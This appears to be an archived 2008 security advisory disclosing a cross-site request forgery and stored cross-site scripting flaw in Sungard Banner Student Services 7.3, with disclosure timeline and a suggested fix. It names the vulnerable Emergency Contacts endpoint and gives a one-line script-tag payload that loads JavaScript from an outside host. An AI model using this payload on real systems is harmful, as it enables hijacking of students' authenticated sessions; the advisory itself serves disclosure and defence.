CSRF/XSS in Sungard Banner

From: banner@xxxxxxxx
Date: Tue, 29 Jan 2008 08:43:59 -0800 (PST)

http://ch4n.org/banner.txt

Application: Banner -- Student Services
Version: 7.3
Bug: Cross-site Request Forgery, cross site scripting
Exploitation: Remote, versus authenticated users
Discovery Date: August 21, 2007
Notification Date: August 22, 2007
Disclosure Date: January 29, 2008

Author: Brendan M. Hickey
Website: http://www.bhickey.net
http://www.ch4n.org

INTRODUCTION

"Banner is the world's most widely used collegiate administrative suite of
student, financial aid, finance, human resources, and advancement systems."
-- Sungard.com

"Banner Student fuses administrative and academic functions that make it
easy to manage data while giving prospects, learners (both traditional and
non-traditional), and faculty secure, 24x7, online access to the
information they need. Prospects can apply for admissions. Learners can
search and register for classes by term or date, and retrieve financial
aid data. Faculty can easily manage course information, rosters, and
grading, and advise students."

-- Banner Student product information
(http://www.sungardhe.com/Products/Product.aspx?id=1024)

University students interact with 'Banner Student Services' through a web
interface. Tasks are performed by making POST requests to fixed URLs.
A cross-site script attack facilitated by cross-site request forgery was
discovered in the "Emergency Contacts" section of the service.

BUG

A student may update her emergency contacts through a web form. Each form
field is checked for length, the longest accepting 30 characters, but not
content.
An attacker can inject arbitrary javascript code into an user's session by
luring authenticated Banner users to a website that makes a POST request
to the update contacts script.

The script necessary to update the emergency contacts is located at:
http://BANNERDOMAIN/ss/bwgkoemr.P_UpdateEmrgContacts

Setting the address field (add1) to

<script src=http://ch4n.org/s>

is necessary to include malicious javascript. Other form variables must be
set, this can be seen in the example code.

EXAMPLE CODE

http://ch4n.org/banner_code.txt

VENDOR NOTIFICATION

The vulnerability was disclosed to Sungard on August 22, 2007.

FIX

This vulnerability can be remedied by requiring a magic number to
accompany POST requests.

Prev by Date: PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities
Next by Date: Remote File Disclosure in phpCMS 1.2.2
Previous by thread: PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilities
Next by thread: Remote File Disclosure in phpCMS 1.2.2
Index(es):
- Date
- Thread

Relevant Pages

Office 2007 Home and Student annoying banner
... I have Office 2007 Home and Student version. ... How can I get rid of that ... annoying "non-commercial usage" banner at the top of the screen? ...
(microsoft.public.office.misc)
Re: Ooooopppps. Rights not right...
... Use a log in script to call a compiled file stored on a share. ... > because the classid is for per machine instead of per user. ... > you have create two user classes, one is called student; ... > Put this bat file to the computer startup script in the local group policy. ...
(microsoft.public.windows.server.general)
Re: Changing Gateways for user groups.
... I could set the student computers to a static IP. ... >> connect two remotes sources to the ISA server. ... > logoff script that sets the nic back from static to dhcp. ...
(microsoft.public.windows.server.general)
Re: Parental control problems
... I have created a student account, implemented parental controls and ... need to add the ability for the student to launch the script that I ... can run and I'm trying to add the ability to run my script which mounts ... My Applications lists the applications the students can use. ...
(comp.sys.mac.misc)
Re: [SLE] kde and multiple users question
... Write a script to grab all files from a nominated directory under every ... > login one student would solve our login problems. ... temporary safety, ...
(SuSE)